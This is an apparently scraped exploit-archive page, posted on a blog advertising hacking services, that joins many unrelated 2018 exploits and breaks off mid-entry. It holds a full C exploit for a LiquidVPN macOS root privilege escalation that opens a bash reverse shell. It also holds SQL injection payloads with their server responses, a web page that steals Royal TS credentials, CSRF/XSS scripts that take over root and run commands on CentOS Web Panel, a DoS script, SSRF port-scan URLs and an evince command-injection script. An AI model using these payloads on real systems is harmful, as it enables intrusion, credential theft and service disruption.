/*
=======================================================================
Title: Multiple Privilege Escalation Vulnerabilities
Product: LiquidVPN for MacOS
Vulnerable versions: 1.37, 1.36 and earlier
CVE ID(s): CVE-2018-18856, CVE-2018-18857, CVE-2018-18858, CVE-2018-18859
Impact: Critical
Homepage: https://www.liquidvpn.com
Identified: 2018-09-29
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================
Vendor description:
-------------------
"LiquidVPN creates a secure encrypted link between your device and the
Internet.
When you connect to the Internet from your home, mobile device, office or a
WiFi
hotspot with encryption your traffic can’t be monitored by 3rd parties like
your
ISP. Without encryption, your ISP can store information about the websites
you
use and sell that data to anyone willing to pay for it. Some ISPs even
inject
advertisements into web pages to further profit off of the Internet service
you
pay for."
Source: https://www.liquidvpn.com
Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker
can fully compromise a MacOS system with an installation of the LiquidVPN
client.
Users are urged to uninstall the application until the vendor ships a new
version
of the LiquidVPN client.
Vulnerability overview/description:
-----------------------------------
LiquidVPN installs the helper tool "com.smr.liquidvpn.OVPNHelper" for
performing
privileged (root) actions. In order to allow other LiquidVPN components to
send
messages to the helper tool, it implements an XPC service. Static code
analysis
showed, that the XPC service does not filter incoming messages. This means,
regular users (local attackers) can craft arbitrary XPC messages and send
them
to the service. This leads to the following issues:
1) "anycmd" Privilege Escalation (reserved CVE-2018-18857)
After receiving a message, the service checks for the existence of the
"anycmd" parameter:
============================================================================================
...
__text:00000001000012E8 lea rsi, aAnycmd ; "anycmd"
__text:00000001000012EF mov rdi, r14 ; char *
__text:00000001000012F2 call _strcmp
__text:00000001000012F7 test eax, eax
__text:00000001000012F9 jnz loc_1000016C2
__text:00000001000012FF mov [rbp+var_10A38], r15
__text:0000000100001306 lea rsi, aCommandLine ;
"command_line"
__text:000000010000130D mov rdi, rbx
...
__text:0000000100001336 lea rsi, aR ; "r"
__text:000000010000133D mov rdi, r14 ; char *
__text:0000000100001340 call _popen
...
============================================================================================
If "anycmd" is found, the "command_line" parameter is extracted from the
message
and directly passed on to a call to popen() as an argument.
2) "openvpncmd" Privilege Escalation (reserved CVE-2018-18856)
Similar to the previous vulnerability, the service checks if the "openvpn"
parameter exists. If it does, the "openvpncmd" parameter is extracted and
passed
on to a system() call as an argument:
============================================================================================
...
__text:00000001000013F1 lea rsi, aOpenvpncmd ;
"openvpncmd"
__text:00000001000013F8 mov rdi, rbx
__text:00000001000013FB call _xpc_dictionary_get_string
...
__text:000000010000166A mov rdi, r15 ; char *
__text:000000010000166D call _system
__text:0000000100001672 lea rsi, aReply ; "reply"
__text:0000000100001679 lea rdx, aOpenvpnCommand ;
"openvpn command executed (ver 3)"
__text:0000000100001680 mov rdi, r12
__text:0000000100001683 call _xpc_dictionary_set_string
...
============================================================================================
3) OS Command Injection (reserved CVE-2018-18858)
If the service detects the "openvpn" parameter in a message, it also checks
if
the parameters "tun_path" or "tap_path" exist. If one of them (or both)
are found,
the values are used as source paths for a copy process using the system()
function.
However, the paths are not sanitized before being passed to system():
============================================================================================
...
__text:00000001000013CD lea rsi, aPathTun ; "path_tun"
__text:00000001000013D4 mov rdi, rbx
__text:00000001000013D7 call _xpc_dictionary_get_string
__text:00000001000013DC mov r14, rax
__text:00000001000013DF lea rsi, aPathTap ; "path_tap"
__text:00000001000013E6 mov rdi, rbx
__text:00000001000013E9 call _xpc_dictionary_get_string
...
__text:000000010000143F call _strcat
__text:0000000100001444 mov rdi, rbx ; char *
__text:0000000100001447 call _strlen
...
__text:0000000100001497 mov rdi, rbx ; char *
__text:000000010000149A call _system
..
============================================================================================
4) Loading of arbitrary Kernel Extensions (reserved CVE-2018-18859)
The previous vulnerability can also be used to directly install an arbitrary
kernel extension. When the client is installed, "tun_path" and "tap_path"
are
pointed to the application folder for installing
"/Applications/LiquidVPN.app/Contents/Resources/tun.kext" and
"/Applications/LiquidVPN.app/Contents/Resources/tap.kext".
By crafting an XPC message containing attacker controlled kernel extension
paths,
the helper tool installs the kernel extensions using a call to the system
function
kextload(). Note: Since MacOS 10.13, a Kext needs to be signed. In
adddition to that,
Apple introduced user-approval for installing third party kernel
extensions. However,
as an attacker has local access to the system and user-approval does not
require the
user to enter a root or admin password, this is not a problem.
Proof of concept:
-----------------
The following proof of concepts can be used to execute arbitrary system
commands:
1) "anycmd" Privilege Escalation
============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "anycmd");
xpc_dictionary_set_bool(message, "blocking", FALSE);
xpc_dictionary_set_string(message, "command_line", "[ARBITRARY CMD]");
...
============================================================================================
2) "openvpncmd" Privilege Escalation
============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "openvpncmd", "[ARBITRARY CMD]");
...
============================================================================================
3) OS Command Injection
============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;[ARBITRARY
CMD]");
...
============================================================================================
4) Loading of arbitrary Kernel Extensions
============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "[PATH TO KEXT]");
...
============================================================================================
Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable:
1.37 (most recent) and 1.36.
Earlier versions might be vulnerable as well.
Vendor contact timeline:
------------------------
2018-10-04: Requested security contact via twitter @LiquidVPN
2018-10-11: Contacted vendor through dave@liquidvpn.com
2018-10-11: Sent PGP encrypted advisory (
https://my.liquidvpn.com/canary/syswan)
2018-10-17: Requested status update from vendor
2018-10-30: Sent new contact details & public PGP key to dave@liquidvpn.com
2018-10-30: Received vendor notification:
No patches will be issued as the LiquidVPN client for MacOS
will be
replaced by new app in the future
2018-10-31: Published to Full Disclosure Mailing List
Solution:
---------
None.
Workaround:
-----------
None.
EOF B. Leitner / @2018
*/
// start netcat listener on port 9999
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <xpc/xpc.h>
void what(const char *bin) {
printf("%s <1-4>\n", bin);
printf("[1] Privesc (local reverse shell on port 9999 via \"anycmd\")\n");
printf("[2] Privesc (local reverse shell on port 9999 via \"openvpncmd\")\n");
printf("[3] Privesc (local reverse shell on port 9999 via OS command injection)\n");
printf("[4] KEXT (load arbitrary kernel extension from /tmp/tun.kext (has to be signed for MacOS >= 10.13))\n");
}
int main(int argc, const char *argv[]) {
if (argc == 1 || argc > 2) {
what(argv[0]);
return 0;
}
int option = atoi(argv[1]);
xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0);
switch(option) {
case 1:
// "anycmd"
xpc_dictionary_set_string(message, "cmd", "anycmd");
xpc_dictionary_set_bool(message, "blocking", FALSE);
xpc_dictionary_set_string(message, "command_line", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1");
break;
case 2:
// "openvpncmd"
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "openvpncmd", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1");
break;
case 3:
// cmd injection via "path_tun". "path_tap" is affected by the same bug
mkdir("/tmp/__dummy00_", 0755);
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;bash -i >& /dev/tcp/127.0.0.1/9999 0>&1;cat");
rmdir("/tmp/__dummy00_");
break;
case 4:
// load arbitrary kext via "path_tun". "path_tap" is affected by the same bug
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "/tmp/tun.kext");
break;
default:
what(argv[0]);
return 0;
}
printf("[+] sending xpc message.\n");
xpc_connection_t connection = xpc_connection_create_mach_service("com.smr.liquidvpn.OVPNHelper", NULL, 0);
if (connection == NULL) {
printf("[-] connection to xpc service failed.\n");
return 1;
}
xpc_connection_set_event_handler(connection, ^(xpc_object_t e) {
// we don't need that here.
});
xpc_connection_resume(connection);
printf("[+] check your listener.\n");
xpc_object_t result = xpc_connection_send_message_with_reply_sync(connection, message);
printf("[+] bye.\n");
return 0;
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863587829
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Summary
This is a proof-of-concept exploit of the PortSmash microarchitecture attack, tracked by CVE-2018-5407.
# Setup
## Prerequisites
A CPU featuring SMT (e.g. Hyper-Threading) is the only requirement.
This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in `spy` is likely needed.
## OpenSSL
Download and install OpenSSL 1.1.0h or lower:
cd /usr/local/src
wget https://www.openssl.org/source/openssl-1.1.0h.tar.gz
tar xzf openssl-1.1.0h.tar.gz
cd openssl-1.1.0h/
export OPENSSL_ROOT_DIR=/usr/local/ssl
./config -d shared --prefix=$OPENSSL_ROOT_DIR --openssldir=$OPENSSL_ROOT_DIR -Wl,-rpath=$OPENSSL_ROOT_DIR/lib
make -j8
make test
sudo checkinstall --strip=no --stripso=no --pkgname=openssl-1.1.0h-debug --provides=openssl-1.1.0h-debug --default make install_sw
If you use a different path, you'll need to make changes to `Makefile` and `sync.sh`.
# Tooling
## freq.sh
Turns off frequency scaling and TurboBoost.
## sync.sh
Sync trace through pipes. It has two victims, one of which should be active at a time:
1. The stock `openssl` running `dgst` command to produce a P-384 signature.
2. A harness `ecc` that calls scalar multiplication directly with a known key. (Useful for profiling.)
The script will generate a P-384 key pair in `secp384r1.pem` if it does not already exist.
The script outputs `data.bin` which is what `openssl dgst` signed, and you should be able to verify the ECDSA signature `data.sig` afterwards with
openssl dgst -sha512 -verify secp384r1.pem -signature data.sig data.bin
In the `ecc` tool case, `data.bin` and `secp384r1.pem` are meaningless and `data.sig` is not created.
For the `taskset` commands in `sync.sh`, the cores need to be two logical cores of the same physical core; sanity check with
$ grep '^core id' /proc/cpuinfo
core id : 0
core id : 1
core id : 2
core id : 3
core id : 0
core id : 1
core id : 2
core id : 3
So the script is currently configured for logical cores 3 and 7 that both map to physical core 3 (`core_id`).
## spy
Measurement process that outputs measurements in `timings.bin`. To change the `spy` strategy, check the port defines in `spy.h`. Only one strategy should be active at build time.
Note that `timings.bin` is actually raw clock cycle counter values, not latencies. Look in `parse_raw_simple.py` to understand the data format if necessary.
## ecc
Victim harness for running OpenSSL scalar multiplication with known inputs. Example:
./ecc M 4 deadbeef0123456789abcdef00000000c0ff33
Will execute 4 consecutive calls to `EC_POINT_mul` with the given hex scalar.
## parse_raw_simple.py
Quick and dirty hack to view 1D traces. The top plot is the raw trace. Everything below is a different digital filter of the raw trace for viewing purposes. Zoom and pan are your friends here.
You might have to adjust the `CEIL` variable if the plots are too aggressively clipped.
Python packages:
sudo apt-get install python-numpy python-matplotlib
# Usage
Turn off frequency scaling:
./freq.sh
Make sure everything builds:
make clean
make
Take a measurement:
./sync.sh
View the trace:
python parse_raw_simple.py timings.bin
You can play around with one victim at a time in `sync.sh`. Sample output for the `openssl dgst` victim is in `parse_raw_simple.png`.
# Credits
* Alejandro Cabrera Aldaya (Universidad Tecnológica de la Habana (CUJAE), Habana, Cuba)
* Billy Bob Brumley (Tampere University of Technology, Tampere, Finland)
* Sohaib ul Hassan (Tampere University of Technology, Tampere, Finland)
* Cesar Pereida García (Tampere University of Technology, Tampere, Finland)
* Nicola Tuveri (Tampere University of Technology, Tampere, Finland)
EDB Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45785.zip
Exploit Title: Voovi Social Networking Script 1.0 - 'user' SQL Injection
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.adminspoint.com/voovi/index.php
# Software Link: https://netix.dl.sourceforge.net/project/voovi/voovi%20a%20social%20networking%20script.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/?
#
POST /[PATH]/? HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
user=1' UNION SELECT NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL-- -&password=&action=login&submit=
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 14:22:41 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=v8nhfofpnrt6a4clfqbrp7aa00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5987
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!--
Title: Royal TS/X - Information Disclosure
Author: Jakub Palaczynski
Date: 10. July 2018
CVE: CVE-2018-18865
Affected product:
=============
Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta
Vulnerability - Information Disclosure:
=============================
Any third party web application can steal credentials created in Royal TS/X
when browser extension is enabled.
Browser extension communicates using websockets (default TCP port 54890)
and websockets do not use any validation to verify origin of the request.
PoC website:
==========
-->
<!DOCTYPE html>
<meta charset="utf-8" />
<title>RoyalTS/X Exploit</title>
<script language="javascript" type="text/javascript">
var wsUri = "ws://127.0.0.1:54890/";
var output;
function init()
{
output = document.getElementById("output");
testWebSocket();
}
function testWebSocket()
{
writeToScreen("Let's retrieve some data...");
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}
function onOpen(evt,message)
{
doSend(message);
}
function onClose(evt)
{
}
function onMessage(evt)
{
var obj = JSON.parse(evt.data);
if (obj['Command'] == "GetDocuments") {
for (var x in obj['ResponseData']){
writeToScreen("Name: " + obj['ResponseData'][x]['Name']);
writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']);
for (var y in obj['ResponseData'][x]['Credentials']){
writeToScreen("Username: " +
obj['ResponseData'][x]['Credentials'][y]['UserName']);
writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']);
if (obj['ResponseData'][x]['Unlocked'] == true){
websocket.close();
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\""
+ obj['ResponseData'][x]['Credentials'][y]['ID'] +
"\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}
}
}
}
else {
if (obj['Command'] == "GetLoginInformation") {
var obj = JSON.parse(evt.data);
writeToScreen("AutoFill Data: " + atob(obj['ResponseData']));
}
}
}
function onError(evt)
{
writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);
}
function doSend(message)
{
websocket.send(message);
}
function writeToScreen(message)
{
var pre = document.createElement("p");
pre.style.wordWrap = "break-word";
pre.innerHTML = message;
output.appendChild(pre);
}
window.addEventListener("load", init, false);
</script>
<h2>RoyalTS/X Exploit</h2>
<div id="output"></div>
<!--
Contact:
=======
Jakub[dot]Palaczynski[at]gmail[dot]com
-->
There is a memory corruption issue when processing a malformed RTP video stream in FaceTime that leads to a kernel panic due to a corrupted heap cookie or data abort. This bug can be reached if a user accepts a call from a malicious caller. This issue only affects FaceTime on iOS, it does not crash on a Mac.
The issue can be reproduced using the attached sequence of RTP packets. To reproduce the issue:
1) Build video-replay.c in attached zip (gcc -g -dynamiclib -o mylib video-replay.c) and copy to /usr/lib/mylib
2) Use insert_dylib (https://github.com/Tyilo/insert_dylib) to add /usr/lib/mylib to AVConference (insert_dylib --strip-codesig /usr/lib/mylib AVConference)
3) Edit /System/Library/Sandbox/Profiles/com.apple.avconferenced.sb to add /out as allow file read and write
4) Restart the machine
5) Extract the attached out folder in the zip to /out and change the permissions so it's readable by AVConference
6) Call target, when they pick up, the phone will crash
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45786.zip
# Exploit Title: ServerZilla 1.0 - 'email' SQL Injection
# Dork: N/A
# Date: 2018-11-08
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://serverzilla.sourceforge.io/
# Software Link: https://ayera.dl.sourceforge.net/project/serverzilla/ServerZilla_src.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/reset.php
#
POST /[PATH]/reset.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
email=%27%20%4f%52%20%4e%4f%54%20%31%3d%31%2d%2d%20%45%66%65&code=
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2018 19:57:09 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1117
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# Title: CentOS Web Panel Root Account Takeover + Remote Command Execution <= v0.9.8.740
# Author: InfinitumIT (https://infinitumit.com.tr)
# Vendor Homepage: centos-webpanel.com
# Software Link: http://centos-webpanel.com/cwp-latest
# Version: Up to v0.9.8.740.
# CVE: CVE-2018-18773, CVE-2018-18772 and CVE-2018-18774.
#? Detailed: https://numanozdemir.com/respdisc/cwp.pdf
# Description:
# Attacker can change target server's root password and execute command, by CSRF vulnerability.
# Also, there is a XSS vulnerability, hacker can exploit the CSRF vulnerability by this XSS
# vulnerability and run bad-purposed JavaScript codes on administrator's browser.
# So, CSRF/XSS to full server takeover.
# How to Reproduce:
# Hacker can exploit this vulnerability (changing root password) by XSS or CSRF.
# Hacker will create a website and put those codes into source:
<script>
var url = "http://targetserver:2030/admin/index.php?module=rootpwd";
var params = "ifpost=yes&password1=newpassword&password2=newpassword";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);
</script>
# (Update newpassword as the password that you want to change.)
# If hacker wants to exploit this by CSRF, CWP administrator will click hacker's website.
# But if hacker wants to exploit this by XSS, CWP administrator will click here: (admin's own website)
# http://targetserver:2030/admin/index.php?module=<script%20src=//hackerswebsite.com/password.js></script>
# After exploiting, you can connect to server by Putty or access the CWP panel with the password
# that you have specified from 2030 port.
# The second vulnerability is remote command execution.
# Hacker can exploit this vulnerability (remote command execution) by XSS or CSRF too.
# Again, hacker will create a website and put those codes into source:
<script>
var url = "http://targetserver:2030/admin/index.php?module=send_ssh";
var params = "ssh+command=whoami";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);
</script>
# (Update whoami as command that you want to run.)
# Same logic like top, if hacker wants to exploit this by CSRF, CWP administrator will click hacker's website.
# But if hacker wants to exploit this by XSS, CWP administrator will click here: (admin's own website)
# http://targetserver:2030/admin/index.php?module=<script%20src=//hackerswebsite.com/command.js></script>
# shouldnt think that CSRF/XSS are unimportant vulnerabilities.
# for secure days...
# Exploit Title: Nominas 0.27 - 'username' SQL Injection
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://arixolab.com/proyecto.html
# Software Link: https://netix.dl.sourceforge.net/project/nominascrm/Nominas%20v0.27.tar.gz
# Version: 0.27
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/login/checklogin.php
#
POST /[PATH]/login/checklogin.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/login/login.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 160
username=%27+UNION+ALL+SELECT+0x31%2C0x32%2C0x33%2CCONCAT_WS%280x203a20%2CUSER%28%29%2CDATABASE%28%29%2CVERSION%28%29%29--+Ver+Ayari&password=Efe&logarse=Entrar
HTTP/1.1 302 Found
Date: Fri, 09 Nov 2018 23:08:26 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=agq97ac0093v2f94voc6qfr7j3; path=/
Set-Cookie: PHPSESSID=mqvaree7bi45p9q60fh2g5vhg1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: ../index.php
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# Exploit Title: Mongoose Web Server 6.9 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://cesanta.com/binary.html
# Software Link: https://backend.cesanta.com/cgi-bin/api.cgi?act=dl&os=win
# Version: 6.9
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
#!/usr/bin/python
import socket
print """
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo----
Mongoose Web Server 6.9
Ihsan Sencan
---------------Ooooo----
( )
ooooO ) /
( ) (_/
\ (
\_)
"""
Ip = raw_input("[Ip]: ")
Port = 8080 # Default port
d=[]
c=0
while 1:
try:
d.append(socket.create_connection((Ip,Port)))
d[c].send("BOOM")
print "Sie!"
c+=1
except socket.error:
print "Done!"
raw_input()
break
# Exploit Title: D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery
# Author: John Page (aka hyp3rlinx)
# Date: 2018-11-09
# Vendor: http://us.dlink.com
# Product Link: http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/
# Version: Version 1.03 r0098
# CVE: N/A
# References:
# [Security Issue]
# Using a web browser or script SSRF can be initiated against internal/external systems
# to conduct port scans by leveraging D-LINKs MailConnect component.
# The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended
# to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address,
# leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI.
# This can undermine accountability of where scan or connections actually came from and or bypass
# the FW etc. This can be automated via script or using Web Browser.
# [Exploit/POC]
https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/
reply: OK
#Scan internal port 22 SSH:
https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/
reply: OK
# Exploit Title: Alienor Web Libre 2.0 - SQL Injection
# Dork: N/A
# Date: 2018-11-08
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://alienor.org/
# Software Link: https://excellmedia.dl.sourceforge.net/project/alienorweblibre/alienorweblibre.zip
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php
#
POST /[PATH]/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=aehrspv1bfhbp1iqhkl1107vd7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 306
identifiant=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&mot_de_passe=&inventaire=Inventaire
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2018 22:07:19 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 81
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# Exploit Title: Surreal ToDo 0.6.1.2 - Local File Inclusion
# Dork: N/A
# Date: 2018-11-08
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://getsurreal.com/surrealtodo
# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip
# Version: 0.6.1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?content=[FILE]
#
GET /[PATH]/index.php?content=../../../../Windows/win.ini HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 07 Nov 2018 23:58:36 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1885
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# Exploit Title: evince command line injection
# Date: 2017-09-05
# Exploit Author: Matlink
# Vendor Homepage: https://wiki.gnome.org/Apps/Evince
# Software Link: https://wiki.gnome.org/Apps/Evince
# Version: 3.24.0
# Tested on: Debian sid
# CVE : CVE-2017-1000083
Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083
#! /bin/bash
# define the payload
export PAYLOAD="firefox google.com"
# Create the malicious .cbt file
dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000
tar cvf poc.cbt *.jpg
# Run the malicious file
evince poc.cbt
# Exploit Title: Surreal ToDo 0.6.1.2 - SQL Injection
# Dork: N/A
# Date: 2018-11-08
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://getsurreal.com/surrealtodo
# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip
# Version: 0.6.1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/ajax.php?action=lists&page_id=[SQL]
#
GET /[PATH]/ajax.php?action=lists&page_id=1%20AND%201=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 07 Nov 2018 23:41:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1783
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/search=[SQL]
#
GET /[PATH]/?search=%27%20AND%201=1%20AND%20%27Efe%27%20LIKE%20%27Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 07 Nov 2018 23:44:26 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 5284
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# Exploit Title: CuteFTP Mac 3.1 Denial of Service (PoC)
# Date: 2018-11-06
